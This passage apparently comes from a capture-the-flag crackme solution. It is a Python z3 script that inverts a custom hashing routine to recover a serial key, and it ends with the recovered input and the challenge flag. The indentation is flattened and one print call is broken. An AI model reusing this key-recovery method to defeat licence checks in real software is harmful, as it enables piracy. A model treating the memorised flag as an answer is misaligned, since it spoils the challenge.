branch_topbit0 = If(And(UGE8(inp8, BV8(ord("a"))), ULE8(inp8, BV8(ord("z")))), s5, If(And(UGE8(inp8, BV8(ord("A"))), ULE8(inp8, BV8(ord("Z")))), s6, s7))
s8 = (state32 - BV32(0x21524111)) & BV32(0xFFFFFFFF)
s8 = If(UGE8(inp8, BV8(0x60)), s8 ^ ((inp32 * BV32(0x21)) & BV32(0xFFFFFFFF)), s8)
branch_state1 = If(c_topbit_same, branch_topbit0, s8)
return If(c_state_lsb0, branch_state0, branch_state1)

def round_func(inp8, state32):
inp32 = zext8_to_32(inp8)
round_num = URem(inp32, BV32(5)) + BV32(2)
def one_iter(st, i):
tmp = st & BV32(0x80000000)
st2 = (st << 1) & BV32(0xFFFFFFFF)
st2 = If(tmp != BV32(0), st2 ^ BV32(0x04C11DB7), st2)
if (i & 1) == 0: st2 = st2 ^ inp32
else: st2 = (st2 + BV32(i * 10)) & BV32(0xFFFFFFFF)
return st2
st = state32
for i in range(6):
st_i = one_iter(st, i)
st = If(ULT32(BV32(i), round_num), st_i, st)
return st

def tail_func(inp8, state32):
tmp = LShR(state32, 16) ^ state32
tmp1 = LShR(tmp, 8) ^ tmp
cond = UGT32(tmp1 & BV32(0xF), BV32(7))
return If(cond, (~state32) & BV32(0xFFFFFFFF), state32)

def byte_func(inp8, state32):
st = switch_case(inp8, state32)
st = round_func(inp8, st)
st = tail_func(inp8, st)
return st

def main():
enc = [0x865DBB47, 0x0A6EB190, 0x20476C33, 0x1C8A7693, 0x59FEBDFB]
sn = bytearray()
for i in range(4):
b0, b1, b2, b3 = BitVecs("b0 b1 b2 b3", 8)
bs = [b0, b1, b2, b3]
s = Solver()
for b in bs: s.add(And(b >= 0x20, b <= 0x7e))
state = BV32(0xCAFEBABE+i*4*0x112233)
for b in bs: state = byte_func(b, state)
target = BV32(enc[i])
s.add(state == target)
if s.check() == sat:
m = s.model()
sol = [m.eval(b).as_long() for b in bs]
print(f"[{i}] bytes = {sol} hex = {bytes(sol).hex()} ascii = {bytes(sol)}")
sn += bytearray(sol)
b0, b1, b2 = BitVecs("b0 b1 b2", 8)
bs = [b0, b1, b2]
s = Solver()
for b in bs: s.add(And(b >= 0x20, b <= 0x7e))
state = BV32(0xCAFEBABE+16*0x112233)
for b in bs: state = byte_func(b, state)
target = BV32(enc[4])
s.add(state == target)
if s.check() == sat:
m = s.model()
sol = [m.eval(b).as_long() for b in bs]
print(f"[4] bytes = {sol} hex = {bytes(sol).hex()} ascii = {bytes(sol)}")
sn += bytearray(sol)
print(sn.decode)

if __name__ == "__main__":
main()

The input is D3FE-A7ED-BAAD-C0D3.

CMO{byp4ss3d_f4tm1k3_2o26}